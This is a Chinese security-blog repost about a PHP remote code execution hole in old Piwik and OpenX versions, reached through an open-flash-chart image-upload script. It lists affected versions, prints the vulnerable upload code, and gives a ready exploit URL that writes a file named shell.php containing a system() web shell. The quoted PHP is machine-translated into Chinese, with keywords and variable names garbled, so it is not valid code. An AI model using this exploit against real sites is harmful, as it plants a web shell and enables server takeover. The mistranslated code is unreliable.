Piwik和OpenX多版本存在PHP远程执行漏洞

admin 2021年4月3日19:00:42评论371 views字数 151阅读0分30秒阅读模式

测试通过的版本,本地测试成功:

Piwik 0.4.3
Piwik 0.4.2
Piwik 0.4.1
Piwik 0.4
Piwik 0.2.37
Piwik 0.2.36
Piwik 0.2.35
OpenX 2.8.2
OpenX 2.8.6
OpenX 2.8.5
OpenX 2.8.4
OpenX 2.8.3

目前官方还没给出补丁

分析代码:

    /*这个临时文件,我们将上传的图像文件保存默认路径*/
    $ default_path ='.. / tmp目录,上传,图像/';

    /*检查是否存在$ default_path变量*/
    如果(!file_exists($ default_path))

    /*如果属实,使具有写入权限的目录*/
    mkdir($ default_path,0777,真实);

    /*然后,创建在与上面的文件名称的目录从形式输入“名称”*文件/
    /*这个变量的状态并没有删除后再使用*/

    $destination = $default_path . basename( $_GET[ 'name' ] ); 

    保存您的图象: '. $destination;

    /*恶意代码在这里,并且攻击者能执行这个代码*/
     $jfh = fopen ($destination, ‘w’)或(“不能打开文件”);
    fwrite($ jfh,$ HTTP_RAW_POST_DATA变量);
    fclose($ jfh);
?>

Exp 利用程序:

http://www.***.com/lazivip/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>

文章来源于lcx.cc:Piwik和OpenX多版本存在PHP远程执行漏洞

相关推荐: 【VB】VB 直接执行字符串 ShellCode 的代码

VB 程序内直接执行文本字符串形式的 ShellCode 代码:     这个没什么说的,黑色加粗的是 Hex 十六进制字符串形式的 ShellCode。注释部分是另外一种执行方法,直接执行 bin 二进制格式的 Byte 数组(可以事先放入到资源中,用的时候…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:00:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Piwik和OpenX多版本存在PHP远程执行漏洞http://cn-sec.com/archives/319567.html

发表评论

匿名网友 填写信息